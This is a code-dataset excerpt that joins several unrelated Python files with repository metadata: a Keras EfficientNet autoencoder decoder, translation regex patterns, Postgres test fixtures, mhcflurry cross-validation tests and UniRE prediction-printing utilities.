X, 3, [1280, 1280, 1280], stage=6, block='b')
X = Conv2DTranspose(512, (1, 1), strides=(
1, 1), padding='same', kernel_initializer=glorot_uniform(seed=0))(X)
X, _ = self.convolutional_block_transpose(
X, f=3, filters=[512, 256, 256], stage=6, block='a', s=2)
# # # decoder Stage 2
X = Concatenate()([X, skip_4])
X = Conv2D(512, kernel_size=(3, 3), strides=(1, 1), padding='same')(X)
print("4---- ",X.shape)
X, _ = self.identity_block_transpose(
X, 3, [512, 512, 512], stage=7, block='b')
X = Conv2DTranspose(256, (1, 1), strides=(
1, 1), padding='same', kernel_initializer=glorot_uniform(seed=0))(X)
X, _ = self.convolutional_block_transpose(
X, f=3, filters=[256, 128, 128], stage=7, block='a', s=2)
# X = Cropping2D(cropping=((1, 0), (0, 0)), data_format=None)(X)
# # decoder Stage 3
X = Concatenate()([X, skip_3])
X = Conv2D(256, kernel_size=(3, 3), strides=(1, 1), padding='same')(X)
print("3---- ",X.shape)
X, _ = self.identity_block_transpose(
X, 3, [256, 256, 256], stage=8, block='b')
X = Conv2DTranspose(256, (1, 1), strides=(
1, 1), padding='same', kernel_initializer=glorot_uniform(seed=0))(X)
X, _ = self.convolutional_block_transpose(
X, f=3, filters=[128, 64, 64], stage=8, block='a', s=2)
X = Cropping2D(cropping=((1, 0), (0, 0)), data_format=None)(X)
prediction = Conv2D(1, kernel_size=(3, 3), strides=(1, 1), padding='same')(X)
prediction = Activation('sigmoid')(prediction)
print("pre_5---- ",prediction.shape)
pre_5 = prediction
# # # decoder Stage 4
X = Concatenate()([X, skip_2])
X = Conv2D(128, kernel_size=(3, 3), strides=(1, 1), padding='same')(X)
print("2---- ",X.shape)
X = Conv2DTranspose(128, (1, 1), strides=(
1, 1), name='conv9-1', padding='same', kernel_initializer=glorot_uniform(seed=0))(X)
X = BatchNormalization(axis=3, name='bn_conv9-1')(X)
X = Activation('relu')(X)
X = Conv2DTranspose(64, (3, 3), strides=(2, 2), name='conv9-2',
padding='same', kernel_initializer=glorot_uniform(seed=0))(X)
X = BatchNormalization(axis=3, name='bn_conv9-2')(X)
X = Activation('relu')(X)
X = Cropping2D(cropping=((1, 0), (0, 0)), data_format=None)(X)
prediction = Conv2D(1, kernel_size=(3, 3), strides=(1, 1), padding='same')(X)
prediction = Activation('sigmoid')(prediction)
print("pre_6---- ",prediction.shape)
pre_6 = prediction
# # decoder Stage 5
X = Concatenate()([X, skip_1])
X = Conv2D(64, kernel_size=(3, 3), strides=(1, 1), padding='same')(X)
print("1---- ",X.shape)
X = Conv2DTranspose(64, (1, 1), strides=(
1, 1), name='conv10-1', kernel_initializer=glorot_uniform(seed=0))(X)
X = BatchNormalization(axis=3, name='bn_conv10-1')(X)
X = Activation('relu')(X)
X = Conv2DTranspose(32, (1, 1), strides=(
1, 1), name='conv10-2', kernel_initializer=glorot_uniform(seed=0))(X)
X = BatchNormalization(axis=3, name='bn_conv10-2')(X)
X = Activation('relu')(X)
X = Conv2DTranspose(16, (1, 1), strides=(
1, 1), name='conv10-3', kernel_initializer=glorot_uniform(seed=0))(X)
X = BatchNormalization(axis=3, name='bn_conv10-3')(X)
X = Activation('relu')(X)
X = Conv2DTranspose(1, (3, 3), strides=(2, 2), padding="same")(X)
outputs = Activation('sigmoid')(X)
print('final----', outputs.shape)
new_model = Model(inputs=model.inputs, outputs=[pre_5, pre_6, outputs], name='ResNet_resblock_disp_autoencoder')
# print(autoencoder.summary())
return new_model
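The three outputs `[pre_5, pre_6, outputs]` enable deep supervision: a loss is computed at each decoder scale and combined into one training objective. A hedged sketch of the weighted combination (the weights here are illustrative assumptions, not values taken from this repository):

```python
def multiscale_loss(scale_losses, weights):
    # Weighted sum of per-scale losses, analogous to Keras loss_weights
    assert len(scale_losses) == len(weights)
    return sum(w * l for w, l in zip(weights, scale_losses))


total = multiscale_loss([0.8, 0.5, 0.3], [0.2, 0.3, 0.5])
print(round(total, 2))  # 0.46
```

In Keras the same effect would typically come from compiling the multi-output model with a list of losses and `loss_weights`, so coarser predictions contribute less than the full-resolution output.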
def ours_autoencoder(self, height, width, depth):
# inputs = Input(shape=(height, width, depth))
# model = ResNet50(weights='imagenet',include_top=False,input_shape=(height, width,3))
# # X = model(inputs, training=True)
# # model.summary()
# skip_1 = model.layers[4].output
# skip_2 = model.layers[38].output
# skip_3 = model.layers[80].output
# skip_4 = model.layers[142].output
# skip_5 = model.layers[174].output
# X = model.layers[-1].output
# print('E1-------', skip_1.shape)
# print('E2-------', skip_2.shape)
# print('E3-------', skip_3.shape)
# print('E4-------', skip_4.shape)
# print("5---- ",X.shape)
# use efficientnet as encoder
inputs = Input(shape=(height, width, depth))
model = EfficientNetB0(include_top=False, weights='imagenet', input_shape=(height, width,3))
skip_1 = model.layers[19].output
skip_2 = model.layers[48].output
skip_3 = model.layers[77].output
skip_4 = model.layers[164].output
skip_5 = model.layers[236].output
X = model.layers[-1].output
# # # decoder Stage 1
# X = Concatenate()([X, skip_5])
# X, _ = self.identity_block_transpose(
# X, 3, [2048, 2048, 2048], stage=6, block='b')
X, _ = self.identity_block_transpose(
X, 3, [1280, 1280, 1280], stage=6, block='b')
X = Conv2DTranspose(512, (1, 1), strides=(
1, 1), padding='same', kernel_initializer=glorot_uniform(seed=0))(X)
X, _ = self.convolutional_block_transpose(
X, f=3, filters=[512, 256, 256], stage=6, block='a', s=2)
# # # decoder Stage 2
X = Concatenate()([X, skip_4])
X = Conv2D(512, kernel_size=(3, 3), strides=(1, 1), padding='same')(X)
print("4---- ",X.shape)
X, _ = self.identity_block_transpose(
X, 3, [512, 512, 512], stage=7, block='b')
X = Conv2DTranspose(256, (1, 1), strides=(
1, 1), padding='same', kernel_initializer=glorot_uniform(seed=0))(X)
X, _ = self.convolutional_block_transpose(
X, f=3, filters=[256, 128, 128], stage=7, block='a', s=2)
# X = Cropping2D(cropping=((1, 0), (0, 0)), data_format=None)(X)
# # decoder Stage 3
X = Concatenate()([X, skip_3])
X = Conv2D(256, kernel_size=(3, 3), strides=(1, 1), padding='same')(X)
print("3---- ",X.shape)
X = Conv2DTranspose(256, kernel_size=(4, 4), strides=(2, 2), padding='same')(X)
X = BatchNormalization(axis=-1)(X)
X = Activation('relu')(X)
X = Conv2D(256, kernel_size=(3, 3), strides=(1, 1), padding='same')(X)
X = Activation('relu')(X)
prediction = Conv2D(1, kernel_size=(3, 3), strides=(1, 1), padding='same')(X)
prediction = Activation('sigmoid')(prediction)
prediction = Cropping2D(cropping=((1, 0), (0, 0)), data_format=None)(prediction)
print("pre_5---- ",prediction.shape)
pre_5 = prediction
# # # decoder Stage 4
X = Cropping2D(cropping=((1, 0), (0, 0)), data_format=None)(X)
X = Concatenate()([X, skip_2])
X = Conv2D(128, kernel_size=(3, 3), strides=(1, 1), padding='same')(X)
print("2---- ",X.shape)
X = Conv2DTranspose(128, kernel_size=(4, 4), strides=(2, 2), padding='same')(X)
X = BatchNormalization(axis=-1)(X)
X = Activation('relu')(X)
X = Conv2D(128, kernel_size=(3, 3), strides=(1, 1), padding='same')(X)
X = Activation('relu')(X)
prediction = Conv2D(1, kernel_size=(3, 3), strides=(1, 1), padding='same')(X)
prediction = Activation('sigmoid')(prediction)
prediction = Cropping2D(cropping=((1, 0), (0, 0)), data_format=None)(prediction)
print("pre_6---- ",prediction.shape)
pre_6 = prediction
# # decoder Stage 5
X = Cropping2D(cropping=((1, 0), (0, 0)), data_format=None)(X)
X = Concatenate()([X, skip_1])
X = Conv2D(64, kernel_size=(3, 3), strides=(1, 1), padding='same')(X)
print("1---- ",X.shape)
X = Conv2DTranspose(64, kernel_size=(4, 4), strides=(2, 2), padding='same')(X)
X = BatchNormalization(axis=-1)(X)
X = Activation('relu')(X)
X = Conv2D(64, kernel_size=(3, 3), strides=(1, 1), padding='same')(X)
X = Activation('relu')(X)
X = Conv2DTranspose(1, (3, 3), strides=(1, 1), padding="same")(X)
outputs = Activation('sigmoid')(X)
print('final----', outputs.shape)
new_model = Model(inputs=model.inputs, outputs=[pre_5, pre_6, outputs], name='ours_autoencoder')
# print(autoencoder.summary())
return new_model
def Efficient_autoencoder(self, height, width, depth):
inputs = Input(shape=(height, width, depth))
model = EfficientNetB0(include_top=False, weights='imagenet', input_shape=(height, width,3))
# X = model(inputs, training=True)
for i, layer in enumerate(model.layers):
print(i, '-----', layer.name, '----', layer.output.shape)
model.summary()
return model
| 45.331839 | 163 | 0.585854 | 6,825 | 50,545 | 4.183736 | 0.037802 | 0.009456 | 0.031519 | 0.048189 | 0.917069 | 0.895321 | 0.877881 | 0.864677 | 0.855432 | 0.848603 | 0 | 0.082324 | 0.248749 | 50,545 | 1,114 | 164 | 45.372531 | 0.669651 | 0.143951 | 0 | 0.774709 | 0 | 0 | 0.052415 | 0.002746 | 0 | 0 | 0 | 0 | 0 | 1 | 0.018895 | false | 0 | 0.037791 | 0 | 0.077035 | 0.077035 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
999ec80d867686407df48731589b64c41e0d8a9f | 1,680 | py | Python | config/regex_patterns.py | project-anuvaad/OpenNMT-py | 267d097b9e90d59709fe1c26ea8b8e2c43c755c9 | [
"MIT"
] | null | null | null | config/regex_patterns.py | project-anuvaad/OpenNMT-py | 267d097b9e90d59709fe1c26ea8b8e2c43c755c9 | [
"MIT"
] | 29 | 2019-07-18T10:21:57.000Z | 2019-10-24T11:41:59.000Z | config/regex_patterns.py | project-anuvaad/OpenNMT-py | 267d097b9e90d59709fe1c26ea8b8e2c43c755c9 | [
"MIT"
] | null | null | null | '''
Various regex patterns used to support translation
'''
patterns = {
"p1" : { "regex":r'(\d+,)\s(\d+)', "description":"remove space between number separated by ," },
"p2" : { "regex":r'(\d+.)\s(\d+)', "description":"remove space between number separated by ." },
"p3" : { "regex":r'\d+', "description":"indentify numbers in a string" },
"p4" : { "regex":r'(NnUuMm.,)\s(NnUuMm+)', "replacement":r'\1\2',"description":"remove space between number separated by ," },
"p5" : { "regex":r'(NnUuMm..)\s(NnUuMm+)', "replacement":r'\1\2',"description":"remove space between number separated by ." },
"p6" : { "regex":r'(NnUuMm.,)\s(0NnUuMm+)', "replacement":r'\1\2',"description":"remove space between number separated by ," },
"p7" : { "regex":r'(NnUuMm..)\s(0NnUuMm+)', "replacement":r'\1\2',"description":"remove space between number separated by ." },
"p8" : { "regex":r'(NnUuMm..)\s(NnUuMm..)\s(NnUuMm+)', "replacement":r'\1\2\3',"description":"remove space between 3 number separated by ," },
"p9" : { "regex":r'(NnUuMm.,)\s(NnUuMm.,)\s(NnUuMm+)', "replacement":r'\1\2\3',"description":"remove space between 3 number separated by ." },
"p10": { "regex":r'^(\(|\[|\{)(\d+|\d+.|\d+.\d+)(\)|\]|\})$', "description":"regex for handling different types of number prefix ie in first token only,brackets variations"},
"p11": { "regex":r'^(\d+|\d+.|\d+.\d+)$', "description":"regex for handling different types of number prefix ie in first token only, no brackets variations"}
}
hindi_numbers = ['०','१','२','३','४','५','६','७','८','९','१०','११','१२','१३','१४','१५','१६','१७','१८','१९','२०','२१','२२','२३','२४','२५','२६','२७','२८','२९','३०']
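A quick illustration of how these entries might be applied with Python's `re` module (the sample sentence is made up; two entries are re-declared locally so the snippet is self-contained — `p1` collapses the space after a comma-separated thousands group, `p3` extracts the digit runs):

```python
import re

patterns = {
    "p1": {"regex": r'(\d+,)\s(\d+)', "description": "remove space between numbers separated by ,"},
    "p3": {"regex": r'\d+', "description": "identify numbers in a string"},
}

text = "Population grew to 1, 250 in 2020"
collapsed = re.sub(patterns["p1"]["regex"], r'\1\2', text)
print(collapsed)  # Population grew to 1,250 in 2020
print(re.findall(patterns["p3"]["regex"], collapsed))  # ['1', '250', '2020']
```

The `NnUuMm` patterns follow the same substitution shape but match placeholder tokens rather than raw digits.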
| 84 | 178 | 0.590476 | 234 | 1,680 | 4.235043 | 0.358974 | 0.066599 | 0.177598 | 0.234107 | 0.776993 | 0.776993 | 0.776993 | 0.776993 | 0.776993 | 0.776993 | 0 | 0.056309 | 0.122619 | 1,680 | 19 | 179 | 88.421053 | 0.616011 | 0.029762 | 0 | 0 | 0 | 0 | 0.707768 | 0.118372 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
51111db4680077de4c1c2daa5967ca5a287549a4 | 8,298 | py | Python | mongo-to-sql/mongo_to_sql_tests/constants/postgres.py | wgarlock/mongo-to-sql | b421d48b822c9d8443f76492230987886de34a9d | [
"MIT"
] | null | null | null | mongo-to-sql/mongo_to_sql_tests/constants/postgres.py | wgarlock/mongo-to-sql | b421d48b822c9d8443f76492230987886de34a9d | [
"MIT"
] | 1 | 2021-01-24T21:07:52.000Z | 2021-01-24T21:07:52.000Z | mongo-to-sql/mongo_to_sql_tests/constants/postgres.py | wgarlock/mongo-to-sql | b421d48b822c9d8443f76492230987886de34a9d | [
"MIT"
] | null | null | null | from lorem_text import lorem
postgres_database_name = "postgres_test"
postgres_database_name_no_exist = "postgres_test_i_dont_exist"
clean_table_name = "test_table"
column_mapper_key_id = "_id"
column_mapper_key_var_length_string = "city"
column_mapper_key_int = "pop"
column_mapper_key_fixed_len_string = "state"
column_mapper_key_list = "loc"
column_mapper_key_large_text = "large_text"
column_mapper_key_bool = "is_big"
column_mapper_key_float = "area",
column_mapper_key_tuple = "leaders"
column_mapper_key_dict = "city_hall"
column_mapper_values = [
{
column_mapper_key_id: "01002",
column_mapper_key_var_length_string: "CUSHMAN",
column_mapper_key_int: 36963,
column_mapper_key_fixed_len_string: "MA",
column_mapper_key_list: [
-72.51565, 42.377017
],
column_mapper_key_large_text: lorem.words(255),
column_mapper_key_bool: True,
column_mapper_key_float: 1352374687.06598,
column_mapper_key_tuple: ("wefwef", "wefwef", "wefwef"),
column_mapper_key_dict: {
"name": "home",
"stories": 3
}
},
{
column_mapper_key_id: "01003",
column_mapper_key_var_length_string: "CUSHMAN",
column_mapper_key_int: 36934,
column_mapper_key_fixed_len_string: "OH",
column_mapper_key_list: [
-72.51565, 42.377017
],
column_mapper_key_large_text: lorem.words(255),
column_mapper_key_bool: False,
column_mapper_key_float: 135747856786687.55506598,
column_mapper_key_tuple: ("wefwwefef", "wefweweff", "wefwef", "kjqwdihqwd"),
column_mapper_key_dict: {
"name": "home",
"stories": 3
}
},
{
column_mapper_key_id: "01004",
column_mapper_key_var_length_string: "SHMAN",
column_mapper_key_int: 36965,
column_mapper_key_fixed_len_string: "FL",
column_mapper_key_list: [
-72.51565, 42.377017
],
column_mapper_key_large_text: lorem.words(255),
column_mapper_key_bool: True,
column_mapper_key_float: 13785687.06555598,
column_mapper_key_tuple: ("wefuiluilwef", "weweffwef"),
column_mapper_key_dict: {
"name": "home",
"stories": 3
}
},
{
column_mapper_key_id: "01005",
column_mapper_key_var_length_string: "MAN",
column_mapper_key_int: 36963,
column_mapper_key_fixed_len_string: "GA",
column_mapper_key_list: [
-72.51565, 42.377017
],
column_mapper_key_large_text: lorem.words(255),
column_mapper_key_bool: True,
column_mapper_key_float: 13574756.98,
column_mapper_key_tuple: ("wefuiluilwef", "wefwuiluilf", "weuiluilfwef"),
column_mapper_key_dict: {
"name": "home",
"stories": 3
}
},
{
column_mapper_key_id: "01006",
column_mapper_key_var_length_string: "CUSH",
column_mapper_key_int: 36763,
column_mapper_key_fixed_len_string: "MA",
column_mapper_key_list: [
-74.51565, 42.377017
],
column_mapper_key_large_text: lorem.words(255),
column_mapper_key_bool: False,
column_mapper_key_float: 654687.06598,
column_mapper_key_tuple: ("wwwhhrtwef", "wefwghgergeref", "wefgggjjtyjwef"),
column_mapper_key_dict: {
"name": "home",
"stories": 3
}
},
]
inconsistent_column_mapper_values = [
{
column_mapper_key_id: 1002,
column_mapper_key_var_length_string: "CUSHMAN",
column_mapper_key_int: 36963,
column_mapper_key_fixed_len_string: "MA",
column_mapper_key_list: [
-72.51565, 42.377017
],
column_mapper_key_large_text: lorem.words(255),
column_mapper_key_bool: True,
column_mapper_key_float: 1352374687.06598,
column_mapper_key_tuple: ("wefwef", "wefwef", "wefwef"),
column_mapper_key_dict: {
"name": "home",
"stories": 3
}
},
{
column_mapper_key_id: "01003",
column_mapper_key_var_length_string: "CUSHMAN",
column_mapper_key_int: 36934,
column_mapper_key_fixed_len_string: "OH",
column_mapper_key_list: [
-72.51565, 42.377017
],
column_mapper_key_large_text: lorem.words(255),
column_mapper_key_bool: False,
column_mapper_key_float: 135747856786687.55506598,
column_mapper_key_tuple: ("wefwwefef", "wefweweff", "wefwef", "kjqwdihqwd"),
column_mapper_key_dict: {
"name": "home",
"stories": 3
}
},
{
column_mapper_key_id: 1004,
column_mapper_key_var_length_string: "SHMAN",
column_mapper_key_fixed_len_string: "FL",
column_mapper_key_list: [
-72.51565, 42.377017
],
column_mapper_key_large_text: lorem.words(255),
column_mapper_key_bool: True,
column_mapper_key_float: 13785687.06555598,
column_mapper_key_tuple: ("wefuiluilwef", "weweffwef"),
column_mapper_key_dict: {
"name": "home",
"stories": 3
}
},
{
column_mapper_key_id: "01005",
column_mapper_key_var_length_string: "MAN",
column_mapper_key_int: 36963,
column_mapper_key_fixed_len_string: "GA",
column_mapper_key_list: [
-72.51565, 42.377017
],
column_mapper_key_large_text: lorem.words(255),
column_mapper_key_bool: "True",
column_mapper_key_float: 13574756.98,
column_mapper_key_tuple: ("wefuiluilwef", "wefwuiluilf", "weuiluilfwef"),
column_mapper_key_dict: {
"name": "home",
"stories": 3
}
},
{
column_mapper_key_id: "01006",
column_mapper_key_var_length_string: "CUSH",
column_mapper_key_int: 36763,
column_mapper_key_fixed_len_string: "MA",
column_mapper_key_list: [
-74.51565, 42.377017
],
column_mapper_key_large_text: lorem.words(255),
column_mapper_key_bool: False,
column_mapper_key_float: 654687.06598,
column_mapper_key_tuple: ("wwwhhrtwef", "wefwghgergeref", "wefgggjjtyjwef"),
column_mapper_key_dict: {
"name": "home",
"stories": 3
}
},
]
unique_list_with_id = ["_id"]
column_mapper_values_dict = {
column_mapper_key_id: ["01002", "01003", "01004", "01005", "01006"],
column_mapper_key_var_length_string: ["CUSHMAN", "CUSHMAN", "SHMAN", "MAN", "CUSH"],
column_mapper_key_int: [36963, 36934, 36965, 36963, 36763],
column_mapper_key_fixed_len_string: ["MA", "OH", "FL", "GS", "MA"],
column_mapper_key_list: [
[
-72.51565, 42.377017
],
[
-72.51565, 42.377017
],
[
-72.51565, 42.377017
],
[
-72.51565, 42.377017
],
[
-72.51565, 42.377017
],
],
column_mapper_key_large_text: [
lorem.words(255),
lorem.words(255),
lorem.words(255),
lorem.words(255),
lorem.words(255)
],
column_mapper_key_bool: [True, False, True, True, False],
column_mapper_key_float: [1352374687.06598, 135747856786687.55506598, 13785687.06555598, 13574756.98, 654687.06598],
column_mapper_key_tuple: [
("wefwef", "wefwef", "wefwef"),
("wefwwefef", "wefweweff", "wefwef", "kjqwdihqwd"),
("wefuiluilwef", "weweffwef"),
("wefuiluilwef", "wefwuiluilf", "weuiluilfwef"),
("wwwhhrtwef", "wefwghgergeref", "wefgggjjtyjwef"),
],
column_mapper_key_dict: [
{
"name": "home",
"stories": 3
},
{
"name": "home",
"stories": 3
},
{
"name": "home",
"stories": 3
},
{
"name": "home",
"stories": 3
},
{
"name": "home",
"stories": 3
},
]
}
string_format_constants = [
"_test_id",
"test_id_",
"test__id"
]
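The fixtures above exist in two shapes: row-oriented (`column_mapper_values`, a list of dicts) and column-oriented (`column_mapper_values_dict`, a dict of lists). A small hypothetical helper — not part of the test module — showing the pivot between the two:

```python
def rows_to_columns(rows):
    # Pivot a list of row dicts into a dict of column lists
    columns = {}
    for row in rows:
        for key, value in row.items():
            columns.setdefault(key, []).append(value)
    return columns


sample = [{"_id": "01002", "pop": 36963}, {"_id": "01003", "pop": 36934}]
print(rows_to_columns(sample))  # {'_id': ['01002', '01003'], 'pop': [36963, 36934]}
```

Note this simple pivot assumes every row carries the same keys; the `inconsistent_column_mapper_values` fixture deliberately violates that, which is presumably what the tests exercise.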
| 31.313208 | 120 | 0.598096 | 913 | 8,298 | 4.936473 | 0.106243 | 0.324828 | 0.396051 | 0.053251 | 0.861327 | 0.842911 | 0.820723 | 0.795873 | 0.773242 | 0.768582 | 0 | 0.111036 | 0.291275 | 8,298 | 264 | 121 | 31.431818 | 0.655331 | 0 | 0 | 0.633858 | 0 | 0 | 0.116896 | 0.003133 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.003937 | 0 | 0.003937 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
cf95333b81c993ef0282af397abd85658f737d8b | 3,224 | py | Python | test/test_cross_validation.py | juvejones/mhcflurry_pan | 08b6fd3116230f954db37a1917e70107f1ffe9d9 | [
"Apache-2.0"
] | 1 | 2020-08-06T06:53:46.000Z | 2020-08-06T06:53:46.000Z | test/test_cross_validation.py | juvejones/mhcflurry_pan | 08b6fd3116230f954db37a1917e70107f1ffe9d9 | [
"Apache-2.0"
] | null | null | null | test/test_cross_validation.py | juvejones/mhcflurry_pan | 08b6fd3116230f954db37a1917e70107f1ffe9d9 | [
"Apache-2.0"
] | null | null | null | from __future__ import absolute_import
from nose.tools import eq_
import mhcflurry
import fancyimpute
from mhcflurry.downloads import get_path
from mhcflurry.class1_allele_specific import (
cross_validation_folds,
train_across_models_and_folds)
from mhcflurry.class1_allele_specific.train import (
HYPERPARAMETER_DEFAULTS)
def test_imputation():
imputer = fancyimpute.MICE(
n_imputations=2, n_burn_in=1, n_nearest_columns=25)
train_data = (
mhcflurry.dataset.Dataset.from_csv(
get_path("data_kim2014", "bdata.2009.mhci.public.1.txt"))
.get_alleles(["HLA-A0201", "HLA-A0202", "HLA-A0301"]))
folds = cross_validation_folds(
train_data,
n_folds=3,
imputer=imputer,
drop_similar_peptides=True,
alleles=["HLA-A0201", "HLA-A0202"])
eq_(set(x.allele for x in folds), {"HLA-A0201", "HLA-A0202"})
eq_(len(folds), 6)
for fold in folds:
eq_(fold.train.unique_alleles(), set([fold.allele]))
eq_(fold.imputed_train.unique_alleles(), set([fold.allele]))
eq_(fold.test.unique_alleles(), set([fold.allele]))
def test_cross_validation_no_imputation():
train_data = (
mhcflurry.dataset.Dataset.from_csv(
get_path("data_kim2014", "bdata.2009.mhci.public.1.txt"))
.get_alleles(["HLA-A0201", "HLA-A0202", "HLA-A0301"]))
folds = cross_validation_folds(
train_data,
n_folds=3,
imputer=None,
drop_similar_peptides=True,
alleles=["HLA-A0201", "HLA-A0202"]
)
eq_(set(x.allele for x in folds), {"HLA-A0201", "HLA-A0202"})
eq_(len(folds), 6)
for fold in folds:
eq_(fold.train.unique_alleles(), set([fold.allele]))
eq_(fold.test.unique_alleles(), set([fold.allele]))
models = HYPERPARAMETER_DEFAULTS.models_grid(
activation=["tanh", "relu"],
layer_sizes=[[4]],
embedding_output_dim=[8],
n_training_epochs=[3])
print(models)
df = train_across_models_and_folds(folds, models)
print(df)
assert df.test_auc.mean() > 0.6

def test_cross_validation_with_imputation():
    imputer = fancyimpute.MICE(
        n_imputations=2, n_burn_in=1, n_nearest_columns=25)
    train_data = (
        mhcflurry.dataset.Dataset.from_csv(
            get_path("data_kim2014", "bdata.2009.mhci.public.1.txt"))
        .get_alleles(["HLA-A0201", "HLA-A0202", "HLA-A0301"]))
    folds = cross_validation_folds(
        train_data,
        n_folds=3,
        imputer=imputer,
        drop_similar_peptides=True,
        alleles=["HLA-A0201", "HLA-A0202"])
    eq_(set(x.allele for x in folds), {"HLA-A0201", "HLA-A0202"})
    eq_(len(folds), 6)
    for fold in folds:
        eq_(fold.train.unique_alleles(), set([fold.allele]))
        eq_(fold.imputed_train.unique_alleles(), set([fold.allele]))
        eq_(fold.test.unique_alleles(), set([fold.allele]))

    models = HYPERPARAMETER_DEFAULTS.models_grid(
        activation=["tanh", "relu"],
        layer_sizes=[[4]],
        embedding_output_dim=[8],
        n_training_epochs=[3])
    print(models)

    df = train_across_models_and_folds(folds, models)
    print(df)
    assert df.test_auc.mean() > 0.6
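
The fold layout asserted above (n_folds folds for each requested allele, so 3 * 2 = 6 folds, each tagged by one allele) can be sketched independently of mhcflurry. This is an illustration only; the tuples stand in for the fold objects the tests inspect:

```python
from itertools import product

# The tests above assert len(folds) == n_folds * len(alleles), and that the
# set of fold alleles equals the set of requested alleles.
alleles = ["HLA-A0201", "HLA-A0202"]
n_folds = 3
fold_tags = [(allele, i) for allele, i in product(alleles, range(n_folds))]
assert len(fold_tags) == 6
assert set(a for a, _ in fold_tags) == set(alleles)
```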
# codes/models/utils/__init__.py (ZichengDuan/MVM3D, MIT license)
from .nms.non_maximum_suppression import non_maximum_suppression
# utils/prediction_outputs.py (liu4lin/UniRE, MIT license)
def print_predictions(outputs, file_path, vocab, sequence_label_domain=None):
"""print_predictions prints prediction results
Args:
outputs (list): prediction outputs
file_path (str): output file path
vocab (Vocabulary): vocabulary
sequence_label_domain (str, optional): sequence label domain. Defaults to None.
"""
with open(file_path, 'w') as fout:
for sent_output in outputs:
seq_len = sent_output['seq_len']
assert 'tokens' in sent_output
tokens = [vocab.get_token_from_index(token, 'tokens') for token in sent_output['tokens'][:seq_len]]
print("Token\t{}".format(' '.join(tokens)), file=fout)
if 'text' in sent_output:
print(f"Text\t{sent_output['text']}", file=fout)
if 'sequence_labels' in sent_output and 'sequence_label_preds' in sent_output:
sequence_labels = [
vocab.get_token_from_index(true_sequence_label, sequence_label_domain)
for true_sequence_label in sent_output['sequence_labels'][:seq_len]
]
sequence_label_preds = [
vocab.get_token_from_index(pred_sequence_label, sequence_label_domain)
for pred_sequence_label in sent_output['sequence_label_preds'][:seq_len]
]
print("Sequence-Label-True\t{}".format(' '.join(sequence_labels)), file=fout)
print("Sequence-Label-Pred\t{}".format(' '.join(sequence_label_preds)), file=fout)
if 'joint_label_matrix' in sent_output:
for row in sent_output['joint_label_matrix'][:seq_len]:
print("Joint-Label-True\t{}".format(' '.join(
[vocab.get_token_from_index(item, 'ent_rel_id') for item in row[:seq_len]])),
file=fout)
if 'joint_label_preds' in sent_output:
for row in sent_output['joint_label_preds'][:seq_len]:
print("Joint-Label-Pred\t{}".format(' '.join(
[vocab.get_token_from_index(item, 'ent_rel_id') for item in row[:seq_len]])),
file=fout)
if 'separate_positions' in sent_output:
print("Separate-Position-True\t{}".format(' '.join(map(str, sent_output['separate_positions']))),
file=fout)
if 'all_separate_position_preds' in sent_output:
print("Separate-Position-Pred\t{}".format(' '.join(map(str,
sent_output['all_separate_position_preds']))),
file=fout)
if 'span2ent' in sent_output:
for span, ent in sent_output['span2ent'].items():
ent = vocab.get_token_from_index(ent, 'span2ent')
assert ent != 'None', "true relation can not be `None`."
print("Ent-True\t{}\t{}\t{}".format(ent, span, ' '.join(tokens[span[0]:span[1]])), file=fout)
if 'all_ent_preds' in sent_output:
for span, ent in sent_output['all_ent_preds'].items():
# ent = vocab.get_token_from_index(ent, 'span2ent')
print("Ent-Span-Pred\t{}".format(span), file=fout)
print("Ent-Pred\t{}\t{}\t{}".format(ent, span, ' '.join(tokens[span[0]:span[1]])), file=fout)
if 'span2rel' in sent_output:
for (span1, span2), rel in sent_output['span2rel'].items():
rel = vocab.get_token_from_index(rel, 'span2rel')
assert rel != 'None', "true relation can not be `None`."
if rel[-1] == '<':
span1, span2 = span2, span1
print("Rel-True\t{}\t{}\t{}\t{}\t{}".format(rel[:-2], span1, span2,
' '.join(tokens[span1[0]:span1[1]]),
' '.join(tokens[span2[0]:span2[1]])),
file=fout)
if 'all_rel_preds' in sent_output:
for (span1, span2), rel in sent_output['all_rel_preds'].items():
# rel = vocab.get_token_from_index(rel, 'span2rel')
if rel[-1] == '<':
span1, span2 = span2, span1
print("Rel-Pred\t{}\t{}\t{}\t{}\t{}".format(rel[:-2], span1, span2,
' '.join(tokens[span1[0]:span1[1]]),
' '.join(tokens[span2[0]:span2[1]])),
file=fout)
print(file=fout)

def print_predictions_for_joint_decoding(outputs, file_path, vocab):
    """print_predictions_for_joint_decoding prints prediction results

    Args:
        outputs (list): prediction outputs
        file_path (str): output file path
        vocab (Vocabulary): vocabulary
    """
    with open(file_path, 'w') as fout:
        for sent_output in outputs:
            seq_len = sent_output['seq_len']
            assert 'tokens' in sent_output
            tokens = [vocab.get_token_from_index(token, 'tokens') for token in sent_output['tokens'][:seq_len]]
            print("Token\t{}".format(' '.join(tokens)), file=fout)
            if 'joint_label_matrix' in sent_output:
                for row in sent_output['joint_label_matrix'][:seq_len]:
                    print("Joint-Label-True\t{}".format(' '.join(
                        [vocab.get_token_from_index(item, 'ent_rel_id') for item in row[:seq_len]])),
                        file=fout)
            if 'joint_label_preds' in sent_output:
                for row in sent_output['joint_label_preds'][:seq_len]:
                    print("Joint-Label-Pred\t{}".format(' '.join(
                        [vocab.get_token_from_index(item, 'ent_rel_id') for item in row[:seq_len]])),
                        file=fout)
            if 'separate_positions' in sent_output:
